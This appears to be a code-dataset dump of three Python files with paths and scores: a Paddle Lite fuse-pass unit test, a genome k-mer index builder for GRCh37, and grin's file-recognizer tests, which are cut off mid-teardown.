scale_y = draw(st.sampled_from([0.1, 1.1]))
scale_out = draw(st.sampled_from([0.1, 1.1]))
force_fp32_output = draw(st.booleans())
squeeze2_op = OpConfig(
type="squeeze2",
inputs={"X": ["squeeze2_input_x"]},
outputs={
"Out": ["squeeze2_output"],
"XShape": ["squeeze2_output_XShape"]
},
attrs={
"axes": [2, 3] #required in pass
})
matmul_op = OpConfig(
type="matmul",
inputs={"X": ["squeeze2_output"],
"Y": ["matmul_input"]},
outputs={"Out": ["output_data"]},
attrs={
"transpose_X": False, #required in pass
"transpose_Y": False, #required in pass
"x_num_col_dims": x_num_col_dims,
"y_num_col_dims": y_num_col_dims,
"Scale_x": scale_x,
"Scale_y": scale_y,
"Scale_out": scale_out,
"force_fp32_output": force_fp32_output,
"alpha": alpha,
"fused_reshape_X": [],
"fused_transpose_X": [],
"fused_reshape_Y": [],
"fused_transpose_Y": [],
"fused_reshape_Out": [],
"fused_transpose_Out": [],
"head_number": int(1)
})
ops = [squeeze2_op, matmul_op]
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"squeeze2_input_x": TensorConfig(shape=squeeze2_input_shape),
"matmul_input": TensorConfig(shape=matmul_input_shape)
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
atol, rtol = 1e-5, 1e-5
config_lists = self.get_predictor_configs()
for config in config_lists:
if config.target() in [TargetType.Metal]:
atol, rtol = 1e-2, 1e-2
return self.get_predictor_configs(), ["mul"], (atol, rtol)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
target_str = self.get_target()
max_examples = 25
if target_str in ["Metal"]:
# Make sure to generate enough valid cases for specific targets
max_examples = 500
self.run_and_statis(
quant=False,
max_examples=max_examples,
passes=["lite_squeeze2_matmul_fuse_pass"])
if __name__ == "__main__":
unittest.main(argv=['']) | lite/tests/unittest_py/pass/test_squeeze2_matmul_fuse_pass.py |
import sys
sys.path.append('..')
from auto_scan_test import FusePassAutoScanTest
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import numpy as np
from functools import partial
from typing import Optional, List, Callable, Dict, Any, Set
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume, reproduce_failure
import hypothesis.strategies as st
class TestSqueeze2MatmulFusePass(FusePassAutoScanTest):
def __init__(self, *args, **kwargs):
FusePassAutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.ARM,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
#x86
self.enable_testing_on_place(
TargetType.X86,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
#Metal
metal_places = [
Place(TargetType.Metal, PrecisionType.FP32,
DataLayoutType.MetalTexture2DArray),
Place(TargetType.Metal, PrecisionType.FP16,
DataLayoutType.MetalTexture2DArray),
Place(TargetType.ARM, PrecisionType.FP32),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=metal_places)
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
target_type = predictor_config.target()
in_shape = list(program_config.inputs["squeeze2_input_x"].shape)
if target_type in [TargetType.Metal]:
if in_shape[1] != 1:
return False
return True
def sample_program_configs(self, draw):
alpha = draw(st.floats(min_value=1, max_value=1)) #required in pass
x_num_col_dims = draw(st.floats(min_value=0, max_value=1))
y_num_col_dims = draw(st.floats(min_value=0, max_value=1))
int32_values_1 = draw(st.integers(min_value=1, max_value=40))
int32_values_2 = draw(st.integers(min_value=1, max_value=40))
int32_values_3 = draw(st.integers(min_value=1, max_value=40))
squeeze2_input_shape = [int32_values_1, int32_values_2, 1, 1]
matmul_input_shape = [squeeze2_input_shape[1], int32_values_3]
scale_x = draw(st.sampled_from([0.1, 1.1]))
scale_y = draw(st.sampled_from([0.1, 1.1]))
scale_out = draw(st.sampled_from([0.1, 1.1]))
force_fp32_output = draw(st.booleans())
squeeze2_op = OpConfig(
type="squeeze2",
inputs={"X": ["squeeze2_input_x"]},
outputs={
"Out": ["squeeze2_output"],
"XShape": ["squeeze2_output_XShape"]
},
attrs={
"axes": [2, 3] #required in pass
})
matmul_op = OpConfig(
type="matmul",
inputs={"X": ["squeeze2_output"],
"Y": ["matmul_input"]},
outputs={"Out": ["output_data"]},
attrs={
"transpose_X": False, #required in pass
"transpose_Y": False, #required in pass
"x_num_col_dims": x_num_col_dims,
"y_num_col_dims": y_num_col_dims,
"Scale_x": scale_x,
"Scale_y": scale_y,
"Scale_out": scale_out,
"force_fp32_output": force_fp32_output,
"alpha": alpha,
"fused_reshape_X": [],
"fused_transpose_X": [],
"fused_reshape_Y": [],
"fused_transpose_Y": [],
"fused_reshape_Out": [],
"fused_transpose_Out": [],
"head_number": int(1)
})
ops = [squeeze2_op, matmul_op]
program_config = ProgramConfig(
ops=ops,
weights={},
inputs={
"squeeze2_input_x": TensorConfig(shape=squeeze2_input_shape),
"matmul_input": TensorConfig(shape=matmul_input_shape)
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
atol, rtol = 1e-5, 1e-5
config_lists = self.get_predictor_configs()
for config in config_lists:
if config.target() in [TargetType.Metal]:
atol, rtol = 1e-2, 1e-2
return self.get_predictor_configs(), ["mul"], (atol, rtol)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
target_str = self.get_target()
max_examples = 25
if target_str in ["Metal"]:
# Make sure to generate enough valid cases for specific targets
max_examples = 500
self.run_and_statis(
quant=False,
max_examples=max_examples,
passes=["lite_squeeze2_matmul_fuse_pass"])
if __name__ == "__main__":
unittest.main(argv=['']) | 0.599368 | 0.350171 |
from numba import jit
import numpy as np
import re
from multiprocessing import Pool
from math import ceil
@jit
def BaseToNum(chr_seq):
chr_seq = re.sub(r'A', '1', chr_seq)
chr_seq = re.sub(r'C', '2', chr_seq)
chr_seq = re.sub(r'G', '3', chr_seq)
chr_seq = re.sub(r'T', '4', chr_seq)
return chr_seq
@jit
def BaseToIndex(word,word_len):
tmp = 0
for i,v in enumerate(word):
tmp += (int(v)-1)*4**(word_len-i)
return tmp
@jit
def GenSeek(library,word_len):
seeks = np.zeros((4**word_len,2),dtype=int)
tmp = 0
for i,l in enumerate(library):
seeks[i,0] = tmp
seeks[i,1] = len(l)
tmp += len(l)
return seeks
def BuildLibrary(chr_name):
word_len = 11
chr_seq = chrom_dict[chr_name]
chr_seq = BaseToNum(chr_seq)
chr_len = len(chr_seq)
library = np.zeros(4**word_len,dtype=str).tolist()
ii = 0
while ii<chr_len-word_len:
w = chr_seq[ii:ii+word_len]
ii += 1
if 'N' in w:
continue
try:
library[BaseToIndex(w,word_len-1)] += str(ii)+","
except:
pass
seeks = GenSeek(library,word_len)
lib_seq = ''.join(library)
with open('/home/jxiaoae/class/blast/chromosome_{}_library.txt'.format(chr_name), 'w') as f:
f.write(lib_seq)
f.close()
np.save('/home/jxiaoae/class/blast/chromosome_{}_library_seeks.npy'.format(chr_name),seeks)
if __name__ == '__main__':
hg19 = open("/home/share/GRCh37/human_g1k_v37.fasta")
head = True
chrom_dict = {}
head_line = []
chr_names = []
for line in hg19:
if re.match(r">[1-9X-Y]|[12][0-9]",line):
head_line.append(line)
if head:
head = False
else:
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chr_name = line.split()[0][1:]
chr_names.append(chr_name)
chr_seq = ''
print(chr_name,end=",")
else:
chr_seq += line
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chrom_seek_index = np.array([[int(line.split(":")[-2]),len(line)] for line in head_line])
for i in range(1,24):
chrom_seek_index[i,1]=chrom_seek_index[i,1]+chrom_seek_index[i-1,1]+chrom_seek_index[i-1,0]+ceil(chrom_seek_index[i-1,0]/60)
np.save('/home/jxiaoae/class/blast/GRCh37_chrom_seek_index.npy',chrom_seek_index)
np.save('/home/jxiaoae/class/blast/GRCh37_chr_names.npy',np.array(chr_names))
print(chr_names)
# reset multiprocessing num according to your server
with Pool(10) as p:
p.map(BuildLibrary, chr_names) | build_library.py | from numba import jit
import numpy as np
import re
from multiprocessing import Pool
from math import ceil
@jit
def BaseToNum(chr_seq):
chr_seq = re.sub(r'A', '1', chr_seq)
chr_seq = re.sub(r'C', '2', chr_seq)
chr_seq = re.sub(r'G', '3', chr_seq)
chr_seq = re.sub(r'T', '4', chr_seq)
return chr_seq
@jit
def BaseToIndex(word,word_len):
tmp = 0
for i,v in enumerate(word):
tmp += (int(v)-1)*4**(word_len-i)
return tmp
@jit
def GenSeek(library,word_len):
seeks = np.zeros((4**word_len,2),dtype=int)
tmp = 0
for i,l in enumerate(library):
seeks[i,0] = tmp
seeks[i,1] = len(l)
tmp += len(l)
return seeks
def BuildLibrary(chr_name):
word_len = 11
chr_seq = chrom_dict[chr_name]
chr_seq = BaseToNum(chr_seq)
chr_len = len(chr_seq)
library = np.zeros(4**word_len,dtype=str).tolist()
ii = 0
while ii<chr_len-word_len:
w = chr_seq[ii:ii+word_len]
ii += 1
if 'N' in w:
continue
try:
library[BaseToIndex(w,word_len-1)] += str(ii)+","
except:
pass
seeks = GenSeek(library,word_len)
lib_seq = ''.join(library)
with open('/home/jxiaoae/class/blast/chromosome_{}_library.txt'.format(chr_name), 'w') as f:
f.write(lib_seq)
f.close()
np.save('/home/jxiaoae/class/blast/chromosome_{}_library_seeks.npy'.format(chr_name),seeks)
if __name__ == '__main__':
hg19 = open("/home/share/GRCh37/human_g1k_v37.fasta")
head = True
chrom_dict = {}
head_line = []
chr_names = []
for line in hg19:
if re.match(r">[1-9X-Y]|[12][0-9]",line):
head_line.append(line)
if head:
head = False
else:
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chr_name = line.split()[0][1:]
chr_names.append(chr_name)
chr_seq = ''
print(chr_name,end=",")
else:
chr_seq += line
chr_seq = re.sub(r'\n', '', chr_seq)
chr_seq = chr_seq.upper()
chrom_dict[chr_name] = chr_seq
chrom_seek_index = np.array([[int(line.split(":")[-2]),len(line)] for line in head_line])
for i in range(1,24):
chrom_seek_index[i,1]=chrom_seek_index[i,1]+chrom_seek_index[i-1,1]+chrom_seek_index[i-1,0]+ceil(chrom_seek_index[i-1,0]/60)
np.save('/home/jxiaoae/class/blast/GRCh37_chrom_seek_index.npy',chrom_seek_index)
np.save('/home/jxiaoae/class/blast/GRCh37_chr_names.npy',np.array(chr_names))
print(chr_names)
# reset multiprocessing num according to your server
with Pool(10) as p:
p.map(BuildLibrary, chr_names) | 0.180504 | 0.178848 |
from __future__ import print_function, unicode_literals
import contextlib
import gzip
import os
import shutil
import socket
import sys
from io import open
from functools import partial
import nose
from grin import FileRecognizer, GZIP_MAGIC
printerr = partial(print, file=sys.stderr)
ALL_BYTES = bytes(bytearray(range(256)))
def empty_file(filename, open=open):
open(filename, "a").close()
def binary_file(filename, open=open):
with open(filename, "wb") as f:
f.write(ALL_BYTES)
def text_file(filename, open=open):
lines = [b"foo\n", b"bar\n"] * 100
lines.append(b"baz\n")
lines.extend([b"foo\n", b"bar\n"] * 100)
with open(filename, "wb") as f:
f.writelines(lines)
def fake_gzip_file(filename, open=open):
""" Write out a binary file that has the gzip magic header bytes, but is not
a gzip file.
"""
with open(filename, "wb") as f:
f.write(GZIP_MAGIC)
f.write(ALL_BYTES)
def binary_middle(filename, open=open):
""" Write out a file that is text for the first 100 bytes, then 100 binary
bytes, then 100 text bytes to test that the recognizer only reads some of
the file.
"""
text = b"a" * 100 + b"\0" * 100 + b"b" * 100
f = open(filename, "wb")
f.write(text)
f.close()
def socket_file(filename):
s = socket.socket(socket.AF_UNIX)
s.bind(filename)
def unreadable_file(filename):
""" Write a file that does not have read permissions.
"""
text_file(filename)
os.chmod(filename, 0o200)
try:
with open(filename) as f:
pass
except IOError as e:
if "Permission denied" not in str(e):
raise
else:
raise RuntimeError(
"grin tests cannot run on a filesystem that doesn't support chmod(). "
"You will encounter false negative"
)
def unreadable_dir(filename):
""" Make a directory that does not have read permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o300)
def unexecutable_dir(filename):
""" Make a directory that does not have execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o600)
def totally_unusable_dir(filename):
""" Make a directory that has neither read nor execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o100)
def setup():
# Make sure we don't have files remaining from previous tests
teardown()
# Make files to test individual recognizers.
empty_file(b"empty")
binary_file(b"binary")
binary_middle(b"binary_middle")
text_file(b"text")
text_file(b"text~")
text_file(b"text#")
text_file(b"foo.bar.baz")
os.mkdir(b"dir")
binary_file(b".binary")
text_file(b".text")
empty_file(b"empty.gz", open=gzip.open)
binary_file(b"binary.gz", open=gzip.open)
text_file(b"text.gz", open=gzip.open)
binary_file(b".binary.gz", open=gzip.open)
text_file(b".text.gz", open=gzip.open)
fake_gzip_file("fake.gz")
os.mkdir(b".dir")
os.symlink(b"binary", b"binary_link")
os.symlink(b"text", b"text_link")
os.symlink(b"dir", b"dir_link")
os.symlink(b".binary", b".binary_link")
os.symlink(b".text", b".text_link")
os.symlink(b".dir", b".dir_link")
unreadable_file(b"unreadable_file")
unreadable_dir(b"unreadable_dir")
unexecutable_dir(b"unexecutable_dir")
totally_unusable_dir(b"totally_unusable_dir")
os.symlink(b"unreadable_file", b"unreadable_file_link")
os.symlink(b"unreadable_dir", b"unreadable_dir_link")
os.symlink(b"unexecutable_dir", b"unexecutable_dir_link")
os.symlink(b"totally_unusable_dir", b"totally_unusable_dir_link")
text_file(b"text.skip_ext")
os.mkdir(b"dir.skip_ext")
text_file(b"text.dont_skip_ext")
os.mkdir(b"skip_dir")
text_file(b"fake_skip_dir")
socket_file("socket_test")
# Make a directory tree to test tree-walking.
os.mkdir(b"tree")
os.mkdir(b"tree/.hidden_dir")
os.mkdir(b"tree/dir")
os.mkdir(b"tree/dir/subdir")
text_file(b"tree/dir/text")
text_file(b"tree/dir/subdir/text")
text_file(b"tree/text")
text_file(b"tree/text.skip_ext")
os.mkdir(b"tree/dir.skip_ext")
text_file(b"tree/dir.skip_ext/text")
text_file(b"tree/text.dont_skip_ext")
binary_file(b"tree/binary")
os.mkdir(b"tree/skip_dir")
text_file(b"tree/skip_dir/text")
os.mkdir(b"tree/.skip_hidden_dir")
text_file(b"tree/.skip_hidden_file")
os.mkdir(b"tree/unreadable_dir")
text_file(b"tree/unreadable_dir/text")
os.chmod("tree/unreadable_dir", 0o300)
os.mkdir(b"tree/unexecutable_dir")
text_file(b"tree/unexecutable_dir/text")
os.chmod(b"tree/unexecutable_dir", 0o600)
os.mkdir(b"tree/totally_unusable_dir")
text_file(b"tree/totally_unusable_dir/text")
os.chmod(b"tree/totally_unusable_dir", 0o100)
@contextlib.contextmanager
def catch_and_log_env_error(message=None, ignore="No such file or directory", args=()):
""" Catch IOError, print a message, optionnaly reraise. Ignore some types """
try:
yield
except EnvironmentError as e:
if ignore not in str(e):
if message is None:
raise e
printerr(message % (tuple(args) + (e,)))
def teardown():
files_to_delete = [
b"empty",
b"binary",
b"binary_middle",
b"text",
b"text~",
b"empty.gz",
b"binary.gz",
b"text.gz",
b"dir",
b"binary_link",
b"text_link",
b"dir_link",
b".binary",
b".text",
b".binary.gz",
b".text.gz",
b"fake.gz",
b".dir",
b".binary_link",
b".text_link",
b".dir_link",
b"unreadable_file",
b"unreadable_dir",
b"unexecutable_dir",
b"totally_unusable_dir",
b"unreadable_file_link",
b"unreadable_dir_link",
b"unexecutable_dir_link",
b"totally_unusable_dir_link",
b"text.skip_ext",
b"text.dont_skip_ext",
b"dir.skip_ext",
b"skip_dir",
b"fake_skip_dir",
b"text#",
b"foo.bar.baz",
b"tree",
b"socket_test"
]
for filename in files_to_delete:
with catch_and_log_env_error():
os.chmod(filename, 0o777)
if os.path.isdir(filename):
if not filename.startswith(b'/'):
# Make sure we have permission to delete everything
for dirname, dirs, files in os.walk(filename, followlinks=True):
paths = [os.path.join(dirname, p) for p in (dirs + files)]
os.chmod(dirname, 0o777)
for path in paths:
os.chmod(path, 0o777)
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
shutil.rmtree(filename)
else:
with catch_and_log_env_error("Could not delete %r: %r", args=(filename,)):
os.unlink(filename)
def test_binary():
fr = FileRecognizer()
assert fr.is_binary(b"binary")
assert fr.recognize_file(b"binary") == "binary"
assert fr.recognize(b"binary") == "binary"
def test_text():
fr = FileRecognizer()
assert not fr.is_binary(b"text")
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text") == "text"
def test_gzipped():
fr = FileRecognizer()
assert fr.is_binary(b"text.gz")
assert fr.recognize_file(b"text.gz") == "gzip"
assert fr.recognize(b"text.gz") == "gzip"
assert fr.is_binary(b"binary.gz")
assert fr.recognize_file(b"binary.gz") == "binary"
assert fr.recognize(b"binary.gz") == "binary"
assert fr.is_binary(b"fake.gz")
assert fr.recognize_file(b"fake.gz") == "binary"
assert fr.recognize(b"fake.gz") == "binary"
def test_binary_middle():
fr = FileRecognizer(binary_bytes=100)
assert not fr.is_binary(b"binary_middle")
assert fr.recognize_file(b"binary_middle") == "text"
assert fr.recognize(b"binary_middle") == "text"
fr = FileRecognizer(binary_bytes=101)
assert fr.is_binary(b"binary_middle")
assert fr.recognize_file(b"binary_middle") == "binary"
assert fr.recognize(b"binary_middle") == "binary"
def test_socket():
fr = FileRecognizer()
assert fr.recognize(b"socket_test") == "skip"
def test_dir():
fr = FileRecognizer()
assert fr.recognize_directory(b"dir") == "directory"
assert fr.recognize(b"dir") == "directory"
def test_skip_symlinks():
fr = FileRecognizer(skip_symlink_files=True, skip_symlink_dirs=True)
assert fr.recognize(b"binary_link") == "link"
assert fr.recognize_file(b"binary_link") == "link"
assert fr.recognize(b"text_link") == "link"
assert fr.recognize_file(b"text_link") == "link"
assert fr.recognize(b"dir_link") == "link"
assert fr.recognize_directory(b"dir_link") == "link"
def test_do_not_skip_symlinks():
fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
assert fr.recognize(b"binary_link") == "binary"
assert fr.recognize_file(b"binary_link") == "binary"
assert fr.recognize(b"text_link") == "text"
assert fr.recognize_file(b"text_link") == "text"
assert fr.recognize(b"dir_link") == "directory"
assert fr.recognize_directory(b"dir_link") == "directory"
def test_skip_hidden():
fr = FileRecognizer(skip_hidden_files=True, skip_hidden_dirs=True)
assert fr.recognize(b".binary") == "skip"
assert fr.recognize_file(b".binary") == "skip"
assert fr.recognize(b".text") == "skip"
assert fr.recognize_file(b".text") == "skip"
assert fr.recognize(b".dir") == "skip"
assert fr.recognize_directory(b".dir") == "skip"
assert fr.recognize(b".binary_link") == "skip"
assert fr.recognize_file(b".binary_link") == "skip"
assert fr.recognize(b".text_link") == "skip"
assert fr.recognize_file(b".text_link") == "skip"
assert fr.recognize(b".dir_link") == "skip"
assert fr.recognize_directory(b".dir_link") == "skip"
assert fr.recognize(b".text.gz") == "skip"
assert fr.recognize_file(b".text.gz") == "skip"
assert fr.recognize(b".binary.gz") == "skip"
assert fr.recognize_file(b".binary.gz") == "skip"
def test_skip_backup():
fr = FileRecognizer(skip_backup_files=True)
assert fr.recognize_file(b"text~") == "skip"
def test_do_not_skip_backup():
fr = FileRecognizer(skip_backup_files=False)
assert fr.recognize_file(b"text~") == "text"
def test_skip_weird_exts():
fr = FileRecognizer(skip_exts=set())
assert fr.recognize_file(b"text#") == "text"
assert fr.recognize_file(b"foo.bar.baz") == "text"
fr = FileRecognizer(skip_exts=set([b"#", b".bar.baz"]))
assert fr.recognize_file(b"text#") == "skip"
assert fr.recognize_file(b"foo.bar.baz") == "skip"
def test_do_not_skip_hidden_or_symlinks():
fr = FileRecognizer(
skip_hidden_files=False,
skip_hidden_dirs=False,
skip_symlink_dirs=False,
skip_symlink_files=False,
)
assert fr.recognize(b".binary") == "binary"
assert fr.recognize_file(b".binary") == "binary"
assert fr.recognize(b".text") == "text"
assert fr.recognize_file(b".text") == "text"
assert fr.recognize(b".dir") == "directory"
assert fr.recognize_directory(b".dir") == "directory"
assert fr.recognize(b".binary_link") == "binary"
assert fr.recognize_file(b".binary_link") == "binary"
assert fr.recognize(b".text_link") == "text"
assert fr.recognize_file(b".text_link") == "text"
assert fr.recognize(b".dir_link") == "directory"
assert fr.recognize_directory(b".dir_link") == "directory"
assert fr.recognize(b".text.gz") == "gzip"
assert fr.recognize_file(b".text.gz") == "gzip"
assert fr.recognize(b".binary.gz") == "binary"
assert fr.recognize_file(b".binary.gz") == "binary"
def test_do_not_skip_hidden_but_skip_symlinks():
fr = FileRecognizer(
skip_hidden_files=False,
skip_hidden_dirs=False,
skip_symlink_dirs=True,
skip_symlink_files=True,
)
assert fr.recognize(b".binary") == "binary"
assert fr.recognize_file(b".binary") == "binary"
assert fr.recognize(b".text") == "text"
assert fr.recognize_file(b".text") == "text"
assert fr.recognize(b".dir") == "directory"
assert fr.recognize_directory(b".dir") == "directory"
assert fr.recognize(b".binary_link") == "link"
assert fr.recognize_file(b".binary_link") == "link"
assert fr.recognize(b".text_link") == "link"
assert fr.recognize_file(b".text_link") == "link"
assert fr.recognize(b".dir_link") == "link"
assert fr.recognize_directory(b".dir_link") == "link"
assert fr.recognize(b".text.gz") == "gzip"
assert fr.recognize_file(b".text.gz") == "gzip"
assert fr.recognize(b".binary.gz") == "binary"
assert fr.recognize_file(b".binary.gz") == "binary"
def test_lack_of_permissions():
fr = FileRecognizer()
assert fr.recognize(b"unreadable_file") == "unreadable"
assert fr.recognize_file(b"unreadable_file") == "unreadable"
assert fr.recognize(b"unreadable_dir") == "directory"
assert fr.recognize_directory(b"unreadable_dir") == "directory"
assert fr.recognize(b"unexecutable_dir") == "directory"
assert fr.recognize_directory(b"unexecutable_dir") == "directory"
assert fr.recognize(b"totally_unusable_dir") == "directory"
assert fr.recognize_directory(b"totally_unusable_dir") == "directory"
def test_symlink_src_unreadable():
fr = FileRecognizer(skip_symlink_files=False, skip_symlink_dirs=False)
assert fr.recognize(b"unreadable_file_link") == "unreadable"
assert fr.recognize_file(b"unreadable_file_link") == "unreadable"
assert fr.recognize(b"unreadable_dir_link") == "directory"
assert fr.recognize_directory(b"unreadable_dir_link") == "directory"
assert fr.recognize(b"unexecutable_dir_link") == "directory"
assert fr.recognize_directory(b"unexecutable_dir_link") == "directory"
assert fr.recognize(b"totally_unusable_dir_link") == "directory"
assert fr.recognize_directory(b"totally_unusable_dir_link") == "directory"
def test_skip_ext():
fr = FileRecognizer(skip_exts=set([b".skip_ext"]))
assert fr.recognize(b"text.skip_ext") == "skip"
assert fr.recognize_file(b"text.skip_ext") == "skip"
assert fr.recognize(b"text") == "text"
assert fr.recognize_file(b"text") == "text"
assert fr.recognize(b"text.dont_skip_ext") == "text"
assert fr.recognize_file(b"text.dont_skip_ext") == "text"
assert fr.recognize(b"dir.skip_ext") == "directory"
assert fr.recognize_directory(b"dir.skip_ext") == "directory"
def test_skip_dir():
fr = FileRecognizer(skip_dirs=set([b"skip_dir", b"fake_skip_dir"]))
assert fr.recognize(b"skip_dir") == "skip"
assert fr.recognize_directory(b"skip_dir") == "skip"
assert fr.recognize(b"fake_skip_dir") == "text"
assert fr.recognize_file(b"fake_skip_dir") == "text"
def test_walking():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"tree/binary", "binary"),
(b"tree/dir.skip_ext/text", "text"),
(b"tree/dir/subdir/text", "text"),
(b"tree/dir/text", "text"),
(b"tree/text", "text"),
(b"tree/text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b"tree"))
assert result == truth
def predot():
os.chdir(b"tree")
def postdot():
os.chdir(b"..")
@nose.with_setup(predot, postdot)
def test_dot():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"./binary", "binary"),
(b"./dir.skip_ext/text", "text"),
(b"./dir/subdir/text", "text"),
(b"./dir/text", "text"),
(b"./text", "text"),
(b"./text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b"."))
assert result == truth
def predotdot():
os.chdir(b"tree")
os.chdir(b"dir")
def postdotdot():
os.chdir(b"..")
os.chdir(b"..")
@nose.with_setup(predotdot, postdotdot)
def test_dot_dot():
fr = FileRecognizer(
skip_hidden_files=True,
skip_hidden_dirs=True,
skip_exts=set([b".skip_ext"]),
skip_dirs=set([b"skip_dir"]),
)
truth = [
(b"../binary", "binary"),
(b"../dir.skip_ext/text", "text"),
(b"../dir/subdir/text", "text"),
(b"../dir/text", "text"),
(b"../text", "text"),
(b"../text.dont_skip_ext", "text"),
]
result = sorted(fr.walk(b".."))
assert result == truth | tests/test_file_recognizer.py | from __future__ import print_function, unicode_literals
import contextlib
import gzip
import os
import shutil
import socket
import sys
from io import open
from functools import partial
import nose
from grin import FileRecognizer, GZIP_MAGIC
printerr = partial(print, file=sys.stderr)
ALL_BYTES = bytes(bytearray(range(256)))
def empty_file(filename, open=open):
open(filename, "a").close()
def binary_file(filename, open=open):
with open(filename, "wb") as f:
f.write(ALL_BYTES)
def text_file(filename, open=open):
lines = [b"foo\n", b"bar\n"] * 100
lines.append(b"baz\n")
lines.extend([b"foo\n", b"bar\n"] * 100)
with open(filename, "wb") as f:
f.writelines(lines)
def fake_gzip_file(filename, open=open):
""" Write out a binary file that has the gzip magic header bytes, but is not
a gzip file.
"""
with open(filename, "wb") as f:
f.write(GZIP_MAGIC)
f.write(ALL_BYTES)
def binary_middle(filename, open=open):
""" Write out a file that is text for the first 100 bytes, then 100 binary
bytes, then 100 text bytes to test that the recognizer only reads some of
the file.
"""
text = b"a" * 100 + b"\0" * 100 + b"b" * 100
f = open(filename, "wb")
f.write(text)
f.close()
def socket_file(filename):
s = socket.socket(socket.AF_UNIX)
s.bind(filename)
def unreadable_file(filename):
""" Write a file that does not have read permissions.
"""
text_file(filename)
os.chmod(filename, 0o200)
try:
with open(filename) as f:
pass
except IOError as e:
if "Permission denied" not in str(e):
raise
else:
raise RuntimeError(
"grin tests cannot run on a filesystem that doesn't support chmod(). "
"You will encounter false negative"
)
def unreadable_dir(filename):
""" Make a directory that does not have read permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o300)
def unexecutable_dir(filename):
""" Make a directory that does not have execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o600)
def totally_unusable_dir(filename):
""" Make a directory that has neither read nor execute permissions.
"""
os.mkdir(filename)
os.chmod(filename, 0o100)
def setup():
# Make sure we don't have files remaining from previous tests
teardown()
# Make files to test individual recognizers.
empty_file(b"empty")
binary_file(b"binary")
binary_middle(b"binary_middle")
text_file(b"text")
text_file(b"text~")
text_file(b"text#")
text_file(b"foo.bar.baz")
os.mkdir(b"dir")
binary_file(b".binary")
text_file(b".text")
empty_file(b"empty.gz", open=gzip.open)
binary_file(b"binary.gz", open=gzip.open)
text_file(b"text.gz", open=gzip.open)
binary_file(b".binary.gz", open=gzip.open)
text_file(b".text.gz", open=gzip.open)
fake_gzip_file("fake.gz")
os.mkdir(b".dir")
os.symlink(b"binary", b"binary_link")
os.symlink(b"text", b"text_link")
os.symlink(b"dir", b"dir_link")
os.symlink(b".binary", b".binary_link")
os.symlink(b".text", b".text_link")
os.symlink(b".dir", b".dir_link")
unreadable_file(b"unreadable_file")
unreadable_dir(b"unreadable_dir")
unexecutable_dir(b"unexecutable_dir")
totally_unusable_dir(b"totally_unusable_dir")
os.symlink(b"unreadable_file", b"unreadable_file_link")
os.symlink(b"unreadable_dir", b"unreadable_dir_link")
os.symlink(b"unexecutable_dir", b"unexecutable_dir_link")
os.symlink(b"totally_unusable_dir", b"totally_unusable_dir_link")
text_file(b"text.skip_ext")
os.mkdir(b"dir.skip_ext")
text_file(b"text.dont_skip_ext")
os.mkdir(b"skip_dir")
text_file(b"fake_skip_dir")
socket_file("socket_test")
# Make a directory tree to test tree-walking.
os.mkdir(b"tree")
os.mkdir(b"tree/.hidden_dir")
os.mkdir(b"tree/dir")
os.mkdir(b"tree/dir/subdir")
text_file(b"tree/dir/text")
text_file(b"tree/dir/subdir/text")
text_file(b"tree/text")
text_file(b"tree/text.skip_ext")
os.mkdir(b"tree/dir.skip_ext")
text_file(b"tree/dir.skip_ext/text")
text_file(b"tree/text.dont_skip_ext")
binary_file(b"tree/binary")
os.mkdir(b"tree/skip_dir")
text_file(b"tree/skip_dir/text")
os.mkdir(b"tree/.skip_hidden_dir")
text_file(b"tree/.skip_hidden_file")
os.mkdir(b"tree/unreadable_dir")
text_file(b"tree/unreadable_dir/text")
os.chmod("tree/unreadable_dir", 0o300)
os.mkdir(b"tree/unexecutable_dir")
text_file(b"tree/unexecutable_dir/text")
os.chmod(b"tree/unexecutable_dir", 0o600)
os.mkdir(b"tree/totally_unusable_dir")
text_file(b"tree/totally_unusable_dir/text")
os.chmod(b"tree/totally_unusable_dir", 0o100)
@contextlib.contextmanager
def catch_and_log_env_error(message=None, ignore="No such file or directory", args=()):
""" Catch IOError, print a message, optionnaly reraise. Ignore some types """
try:
yield
except EnvironmentError as e:
if ignore not in str(e):
if message is None:
raise e
printerr(message % (tuple(args) + (e,)))
def teardown():
files_to_delete = [
b"empty",
b"binary",
b"binary_middle",
b"text",
b"text~",
b"empty.gz",
b"binary.gz",
b"text.gz",
b"dir",
b"binary_link",
b"text_link",
b"dir_link",
b".binary",
b".text",
b".binary.gz",
b".text.gz",
b"fake.gz",
b".dir",
b".binary_link",
b".text_link",
b".dir_link",
b"unreadable_file",
b"unreadable_dir",
b"unexecutable_dir",
b"totally_unusable_dir",
